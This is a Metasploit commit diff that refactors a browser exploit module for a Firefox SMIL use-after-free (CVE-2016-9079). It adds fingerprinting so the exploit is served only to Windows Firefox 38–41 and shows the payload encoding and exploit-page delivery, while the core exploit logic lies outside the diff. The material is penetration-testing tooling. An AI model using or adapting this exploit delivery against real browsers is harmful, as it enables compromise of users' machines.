Land rapid7#7895, Update firefox_uaf_smil to use BrowserExploitServer

wwebb-r7 · wwebb-r7 · commit b4a9bfc7a965 · 2017-02-01T16:42:39.000-06:00
diff --git a/modules/exploits/windows/browser/firefox_smil_uaf.rb b/modules/exploits/windows/browser/firefox_smil_uaf.rb
@@ -8,7 +8,7 @@
   class MetasploitModule < Msf::Exploit::Remote
     Rank = NormalRanking
 
-    include Msf::Exploit::Remote::HttpServer
+    include Msf::Exploit::Remote::BrowserExploitServer
 
     def initialize(info={})
       super(update_info(info,
@@ -25,9 +25,17 @@ def initialize(info={})
             'William Webb <william_webb[at]rapid7.com>'         # Metasploit module
           ],
           'Platform'       => 'win',
+          'BrowserRequirements' =>
+            {
+              source:  /script/i,
+              os_name: OperatingSystems::Match::WINDOWS,
+              ua_name: HttpClients::FF,
+              # Fixed in Firefox 50.0.2
+              ua_ver: lambda { |ver| ver.to_i.between?(38, 41) }
+            },
           'Targets'        =>
           [
-            [ 'Mozilla Firefox',
+            [ 'Mozilla Firefox 38 to 41',
               {
                 'Platform' => 'win',
                 'Arch'     => ARCH_X86,
@@ -40,11 +48,11 @@ def initialize(info={})
             'InitialAutoRunScript' => 'migrate -f'
           },
           'References'     =>
-          [
-            [ 'CVE', '2016-9079' ],
-            [ 'Bugzilla', '1321066' ]
-          ],
-          'Arch'           => ARCH_X86,
+            [
+              [ 'CVE', '2016-9079' ],
+              [ 'URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=1321066' ],
+              [ 'URL', 'https://www.mozilla.org/en-US/security/advisories/mfsa2016-92/' ]
+            ],
           'DisclosureDate' => "Nov 30 2016",
           'DefaultTarget'  => 0
         )
@@ -60,7 +68,7 @@ def exploit_html(cli)
     p = payload.encoded
     arch = Rex::Arch.endian(target.arch)
     payload_final = Rex::Text.to_unescape(p, arch, prefix='\\u')
-    base_uri = "#{get_resource.chomp('/')}"
+    base_uri = get_module_resource
 
     # stuff that gets adjusted alot during testing
 
@@ -248,28 +256,16 @@ def worker_js(cli)
     send_response(cli, c, { 'Content-Type' => 'application/javascript', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' })
   end
 
-  def is_ff_on_windows(user_agent)
-    target_hash = fingerprint_user_agent(user_agent)
-    if target_hash[:ua_name] !~ /Firefox/ or target_hash[:os_name] !~ /Windows/
-      return false
-    end
-      return true
-  end
-
-  def on_request_uri(cli, request)
+  def on_request_exploit(cli, request, browser_info)
     print_status("Got request: #{request.uri}")
     print_status("From: #{request.headers['User-Agent']}")
-    if (!is_ff_on_windows(request.headers['User-Agent']))
-      print_error("Unsupported user agent: #{request.headers['User-Agent']}")
-      send_not_found(cli)
-      close_client(cli)
-      return
-    end
+
     if request.uri =~ /worker\.js/
       print_status("Sending worker thread Javascript ...")
       worker_js(cli)
       return
     end
+
     if request.uri =~ /index\.html/ or request.uri =~ /\//
 
       print_status("Sending exploit HTML ...")
